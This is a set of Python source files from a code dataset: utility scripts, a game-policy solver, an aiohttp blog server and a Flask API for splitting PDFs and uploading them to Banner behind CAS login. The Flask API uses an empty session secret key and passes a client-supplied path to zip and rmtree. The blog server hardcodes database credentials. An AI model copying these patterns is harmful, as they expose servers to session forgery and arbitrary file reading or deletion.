totalSize)\n\t\t\tsys.stdout.write('\\r')\n\t\t\tsys.stdout.write(\"[%-20s] %d%%\" % ('='*i, 5*i))\n\t\t\tsys.stdout.flush()\n\n\t\turlretrieve(url, name + '.zip', reporthook=dlProgress)\n\t\tprint('\\n')\n\t\tprint(\"Download done! Created file \" + name + '.zip (This will later be deleted).')\n\texcept Exception as e:\n\t\traise e\n\ndef extractZip(fileName):\n\ttry:\n\t\tzip_ref = zipfile.ZipFile(fileName, 'r')\n\t\tzip_ref.extractall()\n\t\tzip_ref.close()\n\texcept Exception as e:\n\t\traise e\n\nargs = sys.argv\nargs.remove(__file__)\n\nif (args != None):\n\tif (len(args) > 0):\n\t\tif (args[0]):\n\t\t\tuserName = args[0]\n\t\telse:\n\t\t\tuserName = input(\"GitHub username: \")\n\telse:\n\t\tuserName = input(\"GitHub username: \")\n\n\tif (len(args) > 1):\n\t\tif (args[1]):\n\t\t\trepository = args[1]\n\t\telse:\n\t\t\trepository = input(\"GitHub repo: \")\n\telse:\n\t\trepository = input(\"GitHub repo: \")\nelse:\n\tuserName = input(\"GitHub username: \")\n\trepository = input(\"GitHub repo: \")\n\nprint('\\n')\n\nprint(\"Started getting info from GitHub\")\nAPIVals = getFromAPI(userName, repository)\nfileName = APIVals['name']\n\nprint(\"Started downloading file\")\ndownloadFile(APIVals['zipball_url'], fileName)\n\nprint(\"Extracting zip file...\")\nextractZip(fileName + '.zip')\n\nprint(\"Removing temp files.\")\nos.remove(fileName + '.zip')","sub_path":"git-clone-release.py","file_name":"git-clone-release.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207138765","text":"\n\n#calss header\nclass _SWEETHEART():\n\tdef __init__(self,): \n\t\tself.name = \"SWEETHEART\"\n\t\tself.definitions = [u'a boyfriend or girlfriend: ', u'used for talking to a person that you love, especially a child or person you have a romantic relationship with : ', u'a kind and generous person: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_sweetheart.py","file_name":"_sweetheart.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"355708478","text":"import functools\nfrom collections import defaultdict\nfrom typing import Dict, Optional, Union\n\nimport yaml\nfrom aiohttp import web\nfrom aiohttp.abc import AbstractView\nfrom openapi_spec_validator import validate_v3_spec\n\nfrom .routes import _SWAGGER_SPECIFICATION\nfrom .swagger import Swagger\nfrom .swagger_route import SwaggerRoute\n\ntry:\n from aiohttp.web_urldispatcher import _ExpectHandler, _WebHandler\nexcept ImportError:\n _ExpectHandler, _WebHandler = None, None\n\n\nclass SwaggerDocs(Swagger):\n def __init__(\n self,\n app: web.Application,\n ui_path: str,\n *,\n request_key: str = \"data\",\n title: str = \"OpenAPI3\",\n version: str = \"1.0.0\",\n description: Optional[str] = None,\n components: Optional[str] = None,\n ) -> None:\n spec: Dict = {\n \"openapi\": \"3.0.0\",\n \"info\": {\"title\": title, \"version\": version},\n \"paths\": defaultdict(lambda: defaultdict(dict)),\n }\n if description is not None:\n spec[\"info\"][\"description\"] = description\n\n if components:\n with open(components) as f:\n spec.update(yaml.safe_load(f))\n\n super().__init__(app, ui_path, spec, request_key)\n\n def add_route(\n self,\n method: str,\n path: str,\n handler: Union[_WebHandler, AbstractView],\n *,\n name: Optional[str] = None,\n expect_handler: Optional[_ExpectHandler] = None,\n ) -> web.AbstractRoute:\n if handler.__doc__ and \"---\" in handler.__doc__:\n *_, spec = handler.__doc__.split(\"---\")\n method_spec = yaml.safe_load(spec)\n method_lower = method.lower()\n self.spec[\"paths\"][path][method_lower] = method_spec\n validate_v3_spec(self.spec)\n route = SwaggerRoute(method_lower, path, handler, swagger=self)\n self._app[_SWAGGER_SPECIFICATION] = self.spec\n handler = functools.partial(self._handle_swagger_call, route)\n\n return self._app.router.add_route(\n method, path, handler, name=name, expect_handler=expect_handler\n )\n","sub_path":"aiohttp_swagger3/swagger_docs.py","file_name":"swagger_docs.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"568671751","text":"import numpy as np\nimport logging\n\nfrom tqdm import tqdm\nfrom typing import Tuple, Optional\n\nfrom landshark import iteration\nfrom landshark.basetypes import OrdinalArraySource, Worker, OrdinalType\nfrom landshark.util import to_masked\n\nlog = logging.getLogger(__name__)\n\n\nclass StatCounter:\n \"\"\"Class that computes online mean and variance.\"\"\"\n def __init__(self, n_features: int) -> None:\n \"\"\"Initialise the counters.\"\"\"\n self._mean = np.zeros(n_features)\n self._m2 = np.zeros(n_features)\n self._n = np.zeros(n_features, dtype=int)\n\n def update(self, array: np.ma.MaskedArray) -> None:\n \"\"\"Update calclulations with new data.\"\"\"\n assert array.ndim == 2\n assert array.shape[0] > 1\n\n new_n = np.ma.count(array, axis=0)\n new_mean = (np.ma.mean(array, axis=0)).data\n new_mean[new_n == 0] = 0. # enforce this condition\n new_m2 = (np.ma.var(array, axis=0, ddof=0) * new_n).data\n\n add_n = new_n + self._n\n if any(add_n == 0): # catch any totally masked images\n add_n[add_n == 0] = 1\n\n delta = new_mean - self._mean\n delta_mean = delta * (new_n / add_n)\n\n self._mean += delta_mean\n self._m2 += new_m2 + (delta * self._n * delta_mean)\n self._n += new_n\n\n @property\n def mean(self) -> np.ndarray:\n \"\"\"Get the current estimate of the mean.\"\"\"\n assert np.all(self._n > 1)\n return self._mean\n\n @property\n def variance(self) -> np.ndarray:\n \"\"\"Get the current estimate of the variance.\"\"\"\n assert np.all(self._n > 1)\n var = self._m2 / self._n\n return var\n\n @property\n def count(self) -> np.ndarray:\n \"\"\"Get the count of each feature.\"\"\"\n return self._n\n\n\nclass Normaliser(Worker):\n\n def __init__(self, mean: np.ndarray, var: np.ndarray,\n missing: Optional[OrdinalType]) -> None:\n self._mean = mean\n self._std = np.sqrt(var)\n self._missing = missing\n\n def __call__(self, x: np.ndarray) -> np.ndarray:\n xm = to_masked(x, self._missing)\n xm -= self._mean\n xm /= self._std\n return xm.data\n\n\ndef get_stats(src: OrdinalArraySource, batchsize: int) \\\n -> Tuple[np.ndarray, np.ndarray]:\n log.info(\"Computing ordinal feature statistics\")\n n_rows = src.shape[0]\n n_cols = src.shape[-1]\n stats = StatCounter(n_cols)\n with tqdm(total=n_rows) as pbar:\n with src:\n for s in iteration.batch_slices(batchsize, n_rows):\n x = src(s)\n bs = x.reshape((-1, x.shape[-1]))\n bm = to_masked(bs, src.missing)\n stats.update(bm)\n pbar.update(x.shape[0])\n mean, variance = stats.mean, stats.variance\n return mean, variance\n","sub_path":"landshark/normalise.py","file_name":"normalise.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"71515268","text":"#!/usr/bin/env spcli\n\n# Hidayat Trimarsanto \n#\n# create an He file with the following format:\n# dHe He POP1 POP2 POP3 ...\n\n\nfrom seqpy import cout, cerr\nfrom seqpy.cmds import arg_parser\nfrom seqpy.core.bioio import tabparser\n\nimport allel\nimport numpy as np\nfrom itertools import combinations\n\ndef init_argparser(p=None):\n\n p = tabparser.init_argparser()\n p.add_argument('-o', '--outfile', default='outfile.dist.txt')\n\n return p\n\n\ndef main( args ):\n\n geno2dist( args )\n\n\ndef geno2dist( args ):\n\n lineparser = tabparser.GenotypeLineParser( args )\n lineparser.set_translator(lineparser.haploid_translator)\n\n # read whole genotype, and release all unused memory\n cerr('I: reading genotype file')\n haplotypes = lineparser.parse_haplotypes()\n\n cerr('I: calculating pairwise dxy')\n distm = pairwise_dxy( haplotypes )\n\n cerr('I: writing to outfile')\n with open(args.outfile, 'wb') as outfile:\n outfile.write( lineparser.get_sample_header(True) )\n outfile.write( b'\\n')\n\n # write the matrix\n np.savetxt(outfile, distm, delimiter='\\t', fmt='%.6f')\n\n\n\ndef pairwise_dxy(haplotypes):\n\n n = len(haplotypes)\n distm = np.zeros((n,n))\n idxs = list(range(len(haplotypes[0])))\n\n for i,j in combinations( range(n), 2):\n cerr('I: pairwising %d - %d' % (i,j))\n x = haplotypes[i]\n y = haplotypes[j]\n d = 0\n c = 0\n for idx in idxs:\n xi = x[idx]\n yi = y[idx]\n if xi == b'-' or yi == b'-': continue\n if xi != yi: d += 1\n c += 1\n distm[i,j] = distm[j,i] = d/c\n\n return distm\n\n\n\n","sub_path":"wgs/geno2dist.py","file_name":"geno2dist.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638368601","text":"import numpy as np\nimport copy\nimport time\n\n# The dictionary of chutes and ladder. \nchutes_ladders = {1: 38, 4: 14, 16: 6, 9: 31, 21: 42, 28: 84, 36: 44, 51: 67, 71: 91, 80: 100, 98: 78, 95: 75, 93: 73, 87: 24, 64: 60, 62: 19, 56: 53, 49: 11, 48: 26}\ncd_list = list(chutes_ladders.keys())\n# Vector to solve for our result later\nb = np.ones(101)\nb[100] = 0\n# Dictionary of dices: key is a face of that dice and value is its corresponding probability\nblack = {4:2/3, 0:1/3}\nred = {6:1/3, 2:2/3}\ngreen = {5:1/2, 1:1/2}\nblue = {3:1}\n\ndef row_calculator(board, square_no, dice):\n faces = list(dice.keys())\n # blue dice only has one face on it, so I design a specific part for it\n #since we flip the side of the equation, most of them are subtracted \n #from the original value that specific point in the matrix\n if dice == blue:\n f1 = faces[0]\n p1 = dice[f1]\n if square_no + 3 < 100:\n if square_no + f1 in cd_list:\n board[square_no][chutes_ladders[square_no + f1]] -= p1\n else:\n board[square_no][square_no + f1] -= p1\n else:\n board[square_no][100] = -1\n # for other dices\n else:\n #get the dice value\n f1 = faces[0]\n f2 = faces[1]\n p1 = dice[f1]\n p2 = dice[f2]\n #algorithm\n if square_no + f1 < 100:\n if square_no+ f1 in cd_list:\n board[square_no][chutes_ladders[square_no+f1]] -= p1\n else:\n board[square_no][square_no+f1] -= p1\n if square_no+f2 in cd_list:\n board[square_no][chutes_ladders[square_no+f2]] -= p2\n else:\n board[square_no][square_no+f2] -= p2\n elif square_no + f2 < 100:\n board[square_no][100] = -p1\n if square_no + f2 in cd_list:\n board[square_no][chutes_ladders[square_no + f2]] -= p2\n else:\n board[square_no][square_no + f2] -= p2\n else:\n board[square_no][100] = -1\n\ndef update(board, square_no, dice):\n #initialize the value of the square to be 1\n board[square_no][square_no] = 1\n if square_no == 100:\n return\n #run the calculation based on the picked dice. 0 denotes black, 1 denotes red, 2 denotes green, and 3 denotes blue\n if dice == 0:\n row_calculator(board, square_no, black)\n if dice == 1:\n row_calculator(board, square_no, red)\n if dice == 2:\n row_calculator(board, square_no, green)\n if dice == 3:\n row_calculator(board, square_no, blue)\n\ndef number_of_moves(board, policy):\n #update the board\n for i in range(101):\n update(board, i, policy[i])\n try:\n x = np.linalg.solve(board, b)\n return x\n # since we can not use blue dice on square 53 (which leads to infinite loop), the matrix lines from 53 \n #created by blue dice contain all 0.\n # which leads to singular matrix and can not be solved. Return a valid value when an error is reached.\n except np.linalg.LinAlgError as err:\n if 'Singular matrix' in str(err):\n return [float('inf')]\n\ndef update_policy(policy, x):\n #check if the new policy makes the x value smaller\n #compute bottom up\n for i in range(99, -1, -1):\n for j in range(4):\n new_board = np.zeros((101, 101))\n policy_new = copy.deepcopy(policy)\n policy_new[i] = j\n x_matrix = number_of_moves(new_board, policy_new)\n x2 = x_matrix[0]\n #if new policy improve optimal moves, get new policy and optimal moves\n if x2 < x:\n policy[i] = j\n x = x2\n return policy, x\n\ndef main():\n start = time.time()\n #use the green dice as the first set of policy, tests showing that initialize a all green dice policy results in best value\n policy = [2 for i in range(101)]\n moves = float('inf')\n #number of trials\n trials = 1\n policy_old = copy.deepcopy(policy)\n policy, moves = update_policy(policy, moves)\n while policy_old != policy:\n policy_old = copy.deepcopy(policy)\n policy, moves = update_policy(policy, moves)\n trials += 1\n end = time.time()\n time_run = end - start\n print(\"Optimal Average Number of Moves Expected to Complete the Game: \",moves)\n print(f\"Execution time of the program is {time_run} seconds with {trials} trials.\")\n print(\"Final Policy, with 0 denotes black, 1 denotes red, 2 denotes green, and 3 denotes blue \\n\", policy)\n return 0\n\nmain()","sub_path":"ChutesandLadders.py","file_name":"ChutesandLadders.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"295581190","text":"import logging;logging.basicConfig(level=logging.INFO)\nimport asyncio,os,json,time\nfrom datetime import datetime\nfrom aiohttp import web\nfrom jinja2 import Environment,FileSystemLoader\nimport www.orm\nfrom www.coroweb import add_routes,add_static\ndef init_jinja2(app,**kw):\n logging.info('init jinja2...')\n options = dict(\n autoescape = kw.get('autoescape',True),\n block_start_string = kw.get('block_start_string','{%'),\n block_end_string = kw.get('block_end_string','%}'),\n variable_start_string = kw.get('variable_start_string','{{'),\n variable_end_string = kw.get('variable_end_string','}}'),\n auto_reload = kw.get('auto_reload',True)\n )\n path = kw.get('path',None)\n if path is None:\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)),'templates')\n logging.info('set jinja2 template path:%s' % path)\n env = Environment(loader=FileSystemLoader(path),**options)\n filters = (kw.get('filters',None))\n if filters is not None:\n for name,f in filters.items():\n env.filters[name] = f\n app['__templating__'] = env\n\n# @get('/')\n# def index(request):\n# summary = 'Lorem ipsum dolor sit amet,consectetur adipisicing elit,sed do eiusmod tempor incididuntut labore et dolore magna aliqua'\n# blogs = [\n# Blog(id='1',name='Test Blog',summary=summary,create_at=time.time()-120),\n# Blog(id='2',name='Something New',summary=summary,create_at=time.time()-3600),\n# Blog(id='3',name='Learn Swift',summary=summary,create_at=time.time()-7200)\n# ]\n# return {\n# '__template__': 'blogs.html',\n# 'blogs': blogs\n# }\n\nasync def logger_factory(app,handler):\n async def logger(request):\n logging.info('Request:%s %s' % (request.method,request.path))\n return (await handler(request))\n return logger\nasync def data_factory(app,handler):\n async def parse_data(request):\n if request.method == 'POST':\n if request.content_type.startswith('application/json'):\n request.__data__ = await request.json()\n logging.info('request json:%s' % str(request.__data__))\n elif request.content_type.startswith('application/x-www-form-urlencoded'):\n request.__data__ = await request.post()\n logging.info('request form:%s' % str(request.__data__))\n return (await handler(request))\n return parse_data\nasync def reponse_factory(app,handler):\n async def response(request):\n logging.info('Response handler...')\n r = await handler(request)\n if isinstance(r,web.StreamResponse):\n return r\n if isinstance(r,bytes):\n resp = web.Response(body=r)\n resp.content_type = 'application/octet-stream'\n return resp\n if isinstance(r,str):\n if r.startswith('redirect:'):\n return web.HTTPFound(r[9:])\n resp = web.Response(body=r.encode('utf-8'))\n resp.content_type = 'text/html;charset=utf-8'\n return resp\n if isinstance(r,dict):\n template = r.get('__template__')\n if template is None:\n resp = web.Response(body=json.dumps(r,ensure_ascii=False,default=lambda o:o.__dict__).encode('utf-8'))\n resp.content_type = 'application/json;charset=utf-8'\n return resp\n else:\n resp = web.Response(body=app['__templating__'].get_template(template).render(**r).encode('utf-8'))\n resp.content_type = 'text/html;charset=utf-8'\n return resp\n if isinstance(r,int) and r >=100 and r < 600:\n return web.Response(r)\n if isinstance(r,tuple) and len(r) == 2:\n t,m = r\n if isinstance(t,int) and t >= 100 and t < 600:\n return web.Response(t,str(m))\n resp = web.Response(body=str(r).encode('utf-8'))\n resp.content_type = 'text/plain;charset=utf-8'\n return resp\n return response\ndef datetime_filter(t):\n delta = int(time.time() - t)\n if delta < 60:\n return u'one min ago'\n if delta < 3600:\n return u'%s min ago' % (delta // 60)\n if delta < 86400:\n return u'%s hour ago' % (delta // 3600)\n if delta< 604800:\n return u'%s day ago' % (delta // 86400)\n dt = datetime.fromtimestamp(t)\n return u'%s year % mouth % day' % (dt.year,dt.month,dt.day)\n# def index(request):\n# return web.Response(body=b'

Asome

',content_type='text/html')\nasync def init(loop):\n await www.orm.create_pool(loop=loop,host='127.0.0.1',port=3306,user='www',password='www',db='awesome')\n app = web.Application(loop=loop,middlewares=[\n logger_factory,reponse_factory\n ])\n init_jinja2(app,filters=dict(datetime=datetime_filter))\n add_routes(app,'handlers')\n add_static(app)\n srv = await loop.create_server(app.make_handler(),'127.0.0.1',9000)\n logging.info('server started at http://127.0.0.1:9000..')\n return srv\nloop = asyncio.get_event_loop()\nloop.run_until_complete(init(loop))\nloop.run_forever()","sub_path":"www/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"418665123","text":"\"\"\"\nFlask API for BDMParse's Angular frontend to communicate with to perform \ndocument functions, login functions, and administrative functions\n\"\"\"\n\n\nimport os, json\nfrom flask import Flask, request, send_file, session, redirect, url_for, abort\nfrom flask_cors import CORS, cross_origin\nfrom doc_splitter import doc_splitter\nimport tempfile\nimport shutil\nimport zipfile\nimport io\nfrom werkzeug.utils import secure_filename\nfrom cas import CASClient\nimport db\nimport banner\nfrom doc_map import map_document_type\nfrom config import VIRTUAL_MACHINE_HOSTNAME\n\n\napp = Flask(__name__)\nCORS(app, expose_headers=[\"x-suggested-filename\"])\n\nALLOWED_EXTENSIONS = {'pdf'}\n\napp.secret_key = ''\n\ncas_client = CASClient(\n version=2,\n service_url= VIRTUAL_MACHINE_HOSTNAME + '/redirecting',\n server_url='https://login.vt.edu/profile/cas/login'\n)\n\ndef allowed_file(filename):\n \"\"\"Checks if the filename provided by the front-end is .pdf file\n \n Parameters\n ----------\n filename : str\n A string containing the filename of the file to be parsed\n \n Returns\n -------\n bool\n True if filename is a .pdf filename, false otherwise\n\n \"\"\"\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef is_admin():\n \"\"\"Checks whether current user accessing the API has admin privileges\n\n Returns\n -------\n bool\n True if user has admin privileges, false otherwise\n\n \"\"\"\n print(\"In is_admin()\")\n if is_logged_in() > 0: #Don't bother checking if not logged in\n #Check if user has admin privledges (>0)\n return True\n return False\n\n\ndef is_logged_in():\n \"\"\"Checks whether user accessing the API is currently logged in\n\n Returns\n -------\n int\n User's role level with 0 being standard user, 1 being admin user if user\n is logged in, -1 otherwise to indicate not logged in.\n\n \"\"\"\n #See if in session and get username\n print(\"In is_logged_in()\")\n\n if 'username' in session:\n print(\"In is_logged_in() if statement\")\n #See if valid username by checking each valid username w/ sessions username\n x = db.call_validate_user(session[\"username\"])\n if len(x) > 0:\n print(\"is_logged_in() found valid user\")\n return x[3]\n else:\n session.pop('username', None)\n print(\"is_logged_in() found invalid user\")\n return -1\n\n\ndef is_valid_user(username):\n \"\"\"Checks if username is a valid user of the web application\n\n Queries the database to determine if information exists for the username\n specified\n\n Parameters\n ----------\n username : str\n String of the username to check for existence in the database \n \n Returns\n -------\n bool\n True if information for the user exists, false otherwise\n\n \"\"\"\n x = db.call_validate_user(username)\n if len(x) == 0:\n return False\n else:\n return True\n\n\n@app.route('/api/getuser')\ndef user_json():\n \"\"\"Builds a JSON of the requested user information\n \n Note\n ----\n The GET request should contain the username in the query parameters as ```username```\n\n Returns\n -------\n JSON object\n A JSON object with the following format:\n\n {\n 'username': username,\n 'id': id according to the database,\n 'role': Either admin or standard depending on the users database \n level,\n 'college': College the user belongs to,\n 'documentTypes': List of document types for that specific \n college,\n 'userList': List of users belonging to that college for admin \n functions,\n 'termCodes': List of term codes for that specific college\n }\n \n \"\"\"\n \n # Ensure user is logged in\n if is_logged_in() < 0:\n return 'User not logged in', 401\n \n #loop through all users to find the user\n username = request.args.get('username')\n\n x = db.call_validate_user(username)\n\n #return an empty json if user not in database\n if len(x) == 0:\n return json.dumps({\n 'username':None,\n 'id':None,\n 'role':None,\n 'college':None,\n 'documentTypes':None,\n 'userList':None,\n 'termCodes':None\n }), 200, {'ContentType':'application/json'}\n else:\n #get all the other needed info\n #Check privilege level\n role = 'standard'\n userList = None\n if x[3] >= 1:\n role = 'admin'\n userList = [\n {\n 'id': user[0],\n 'username': user[1],\n 'role': 'standard' if user[2] == 0 else 'admin'\n } for user in db.call_get_users_by_college(x[2])]\n documentTypes = [\n {\n 'id': document[0],\n 'documentType': document[1]\n } for document in db.call_doc_types_by_college(x[2])]\n termCodes = [\n {\n 'id': code[0],\n 'termCode': code[1]\n } for code in db.call_get_term_codes_by_college(x[2])]\n return json.dumps({\n 'username':username,\n 'id':x[0],\n 'role':role,\n 'roleString':role,\n 'college':x[2],\n 'documentTypes': documentTypes,\n 'userList':userList,\n 'termCodes': termCodes\n }), 200, {'ContentType':'application/json'}\n\n\n@app.route('/api/file/upload', methods=['POST'])\ndef parse():\n \"\"\"Parses an uploaded bulk PDF file into separate PDFs based on PID\n\n Note\n ----\n The POST request should contain multipart form data consisting of a file\n with key ```fileKey``` and arguments for ```documentType``` and ```termCode```\n\n Returns\n -------\n JSON object\n Upon success the JSON object will be formatted as follows:\n\n {\n 'total': The number of parsed PDFs,\n 'num_success': The number of PDFs successfully uploaded to \n Banner,\n 'num_error': The number of erroneous PIDs according to Banner,\n 'successes': List of successful PIDs,\n 'errors': List of erroneous PIDs,\n 'file_path': String of file path containing erroneous pdfs for \n later download\n }\n \n str\n If the user is not logged in, a 403 code will be sent. \n If the provided document type, term code, or file type are invalid a 500 code will be sent with an appropriate message\n \n \"\"\"\n # Ensure user is logged in\n if is_logged_in() < 0:\n return 'User not logged in', 401\n\n if request.method == 'POST':\n\n file = request.files['fileKey']\n print('upload starting')\n print(request.get_json())\n print(request)\n\n document_type = map_document_type(request.args.get('documentType'))\n print(document_type)\n term_code = request.args.get('termCode')\n print(term_code)\n \n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n\n file_path = None\n\n # Make temporary directory\n with tempfile.TemporaryDirectory() as tempdirname:\n # Store pdf into temporary directory\n file.save(os.path.join(tempdirname, filename))\n\n # Call doc_splitter()\n output_directory = doc_splitter(os.path.join(tempdirname, filename)) \n success, error, result = banner.bulk_upload(output_directory, document_type, term_code)\n \n if result == 'Invalid Term Code':\n return 'Invalid Term Code', 500\n elif result == 'Invalid Document Type':\n return \"Invalid Document Type\", 500\n\n if len(error) == 0:\n shutil.rmtree(output_directory)\n else:\n file_path = output_directory\n\n return json.dumps({\n 'total': len(success) + len(error),\n 'num_success': len(success),\n 'num_error': len(error),\n 'successes': [str(id_number) for id_number in success],\n 'errors': [str(id_number) for id_number in error],\n 'file_path': file_path\n })\n \n else:\n return 'Invalid File Type', 500\n\n\n@app.route('/api/file/download', methods=['POST'])\ndef zip_error_files():\n \"\"\"Zips erroneous PID PDFs into a zipfile to be downloaded by the front-end\n\n Note\n ----\n The POST requests should contain parameters passed along in the format:\n\n {\n 'params': {\n 'file_path': String of directory containing erroneous files\n }\n }\n \n Returns\n -------\n zipfile\n A zipfile containing the parsed erroneous PDFs\n \n \"\"\"\n # Ensure user is logged in\n if is_logged_in() < 0:\n return 'User not logged in', 401\n \n # Obtain file path from request params\n file_directory = request.get_json()['params']['file_path']\n\n # Create temporary data in memory for zipfile\n data = io.BytesIO()\n\n with zipfile.ZipFile(data, mode='w') as z:\n for f_name in os.listdir(file_directory):\n print(os.path.join(file_directory, f_name))\n z.write(os.path.join(file_directory, f_name), arcname=f_name)\n \n data.seek(0)\n\n # Remove erroneous files off VM and remove temporary directory containing\n # them\n shutil.rmtree(file_directory)\n\n # Return zip file of parsed PDFs\n result = send_file(data, mimetype='application/zip', attachment_filename=\"parsed.zip\", as_attachment=True)\n\n result.headers[\"x-suggested-filename\"] = \"parsed.zip\"\n return result\n\n\n@app.route('/api/login')\ndef login():\n \"\"\"Ensures user is logged in and then redirects to parsing page OR redirects\n to CAS for login if not already logged in before CAS redirects here to check \n again\n\n Note\n ----\n The GET request should containing the following arguments\n\n 'next'\n The link to redirect to after CAS login\n 'ticket'\n The ticket provided by CAS login\n\n Returns\n -------\n str\n CAS login URL if the user is not logged in yet, username if the user\n is logged in, empty string if the user is invalid\n\n \"\"\"\n print('attempting login')\n print(session)\n #Check if user already logged in\n if'username' in session: #Can then compare username to database\n # Already logged in\n username = session['username']\n # session.pop('username', None) #DEBUGGING ONLY\n if is_valid_user(username):\n print(\"valid user w/ session\")\n return username\n else:\n print(\"invalid user w/ session\")\n session.pop('username', None)\n return VIRTUAL_MACHINE_HOSTNAME + '/login'\n\n #Not already logged in\n next = request.args.get('next')\n ticket = request.args.get('ticket')\n print('The ticket is', ticket)\n if not ticket:\n # No ticket, the request comes from user, send to CAS login\n cas_login_url = cas_client.get_login_url() # generates login URL w/ return page\n return cas_login_url\n\n #There is a ticket, the request come from CAS as callback\n #need to call 'verify_ticket()' to validate ticket and get user profile\n user, attributes, pgtiou = cas_client.verify_ticket(ticket)\n \n\n if not user:\n print(\"No user\")\n session.pop('username', None)\n return VIRTUAL_MACHINE_HOSTNAME + '/login'\n else: # Login successfully, redirect according 'next' query parameter\n session['username'] = user\n print(user)\n if is_valid_user(user):\n print(\"New session w/ valid user\")\n return user\n else:\n print(\"New session w/ invalid user\")\n session.pop('username', None)\n return ''\n\n\n@app.route('/api/logout')\ndef logout():\n \"\"\"Forms call to CAS to logout and then performs call and will lead to \n logout_callback\n\n Returns\n -------\n str\n The logout url to send the user to for logging out of CAS\n \n \"\"\"\n print(\"Logging Out\")\n print(\"Session was:\", session)\n session.pop('username', None)\n print(\"Session now:\", session)\n redirect_url = url_for('login', _external=True) #generates URL for endpoint after logout\n cas_logout_url = cas_client.get_logout_url() #gives CAS the URL for redirecting\n print(\"Redirect to\", redirect_url, \"after CAS logout using\", cas_logout_url)\n return cas_logout_url # sends user to CAS logout which will return to endpoint\n\n\n@app.route('/api/admin/addtype', methods=['POST'])\ndef add_type():\n \"\"\"Adds a document type to the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'documentType': String of the new document type to be added,\n 'collegeName': College to add the document type to\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n str\n The unique database ID of the newly added document type\n\n \"\"\"\n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n\n tid = db.call_insert_document_type(request.get_json()['documentType'], request.get_json()['collegeName'])\n print(request.get_json())\n return str(tid)\n\n\n@app.route('/api/admin/adduser', methods=['POST'])\ndef add_user():\n \"\"\"Adds a new user based on their VT username to the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'role': 'admin' if to be added with admin priveleges, else 'standard',\n 'username': VT username of user to be added,\n 'college': College the new user belongs to\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n str\n The unique database ID of the newly added user\n\n \"\"\"\n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n privilege_level = 0\n \n if request.get_json()['role'] == 'admin':\n privilege_level = 1\n\n uid = db.call_insert_user(request.get_json()['username'], privilege_level, request.get_json()['college'])\n print(request.get_json())\n return str(uid)\n\n@app.route('/api/admin/addterm', methods=['POST'])\ndef add_term():\n \"\"\"Adds a new term code to the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'termCode': String of the new term code to be added,\n 'collegeName': College list to add the term code to\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n str\n The unique database ID of the newly added term code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n tid = db.call_insert_term_code(request.get_json()['termCode'], request.get_json()['collegeName'])\n print(request.get_json())\n return str(tid)\n\n@app.route('/api/admin/changerole', methods=['POST'])\ndef change_role():\n \"\"\"Changes the role level of the user specified in the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'role': New role to set the user to,\n 'user': VT username of the user to change\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object with ```success: True``` and a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n print(request.get_json())\n\n role = request.get_json()['params']['role']\n level = 0\n\n if role == 'admin':\n level = 1\n\n db.call_change_user_privilege_level(request.get_json()['params']['user'], level)\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n\n@app.route('/api/admin/removetype', methods=['POST'])\ndef remove_type():\n \"\"\"Deletes a document type from the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'id': Unique database ID of the document type,\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object indicating successful deletion with a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n db.call_delete_document_type(int(request.get_json()['params']['id']))\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n\n@app.route('/api/admin/removeuser', methods=['POST'])\ndef remove_user():\n \"\"\"Deletes a user from the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'id': Unique database ID of the user,\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object indicating successful deletion with a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n db.call_delete_user(int(request.get_json()['params']['id']))\n print(request.get_json())\n return json.dumps({'success':True}), 200, 